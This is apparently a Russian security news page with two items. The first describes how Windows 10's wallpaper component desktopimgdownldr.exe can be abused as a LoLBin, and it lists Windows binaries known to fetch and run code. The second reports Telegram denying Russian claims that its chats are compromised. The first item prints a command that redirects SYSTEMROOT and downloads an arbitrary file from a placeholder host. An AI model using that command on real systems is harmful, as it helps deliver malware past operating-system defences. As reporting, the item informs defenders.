Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Telegram опроверг утверждение властей РФ о доступе спецслужб к перепискам

Telegram опроверг возможность перехвата IM-сообщений участников СВО иностранной разведкой. Такое предположение высказал глава Минцифры РФ Максут Шадаев на заседании комитета Госдумы по информполитике.

Комментируя этот выпад для СМИ, администрация мессенджера отметила, что секретные чаты Telegram используют сквозное шифрование. Соответствующие криптоключи хранятся локально, на устройствах пользователей, и содержимое переписок недоступно даже самой веб-службе.

В ходе заседания в Госдуме, состоявшегося два дня назад, высокопоставленный участник заявил:

«Много фактов, которые подтверждены нашими органами, что доступ к переписке в “Телеграме” имеют иностранные спецслужбы, которые используют эти данные в рамках ведения боевых действий против наших Вооруженных сил».

Вместе с тем министр отметил, что в попытках заставить иностранный мессенджер соблюдать российское законодательство никто не собирается «рубить с плеча». Меры принуждения принимаются поэтапно, с пониманием значимости сервиса.

В ответ на запрос «Рейтер» Telegram предоставил резкий комментарий:

«Утверждение российских властей о том, что наше шифрование будто бы скомпрометировано, является преднамеренной фабрикацией, призванной оправдать запрет Telegram».

Ограничения работы популярной IM-службы российские власти объясняют не только борьбой с противоправным контентом, но также стремлением защитить граждан от происков киберкриминала, облюбовавшего Telegram.

С 2022 года МВД РФ зафиксировало 153 тыс. преступлений, совершенных с использованием данного мессенджера; 30 тыс. из них составили диверсии и теракты. Сервис также проигнорировал 150 тыс. запросов на удаление запрещенной в стране информации.

В результате в России для начала ограничили голосовую связь через Telegram, что, по данным Минцифры, позволило снизить объемы мошенничества на 23%.

С 10 февраля начались работы по замедлению Telegram, хотя и не без нежелательного побочного эффекта: у пользователей Windows и разработчиков ОС на основе Linux, в том числе российских, возникли проблемы с получением обновлений.

RSS: Новости на портале Anti-Malware.ru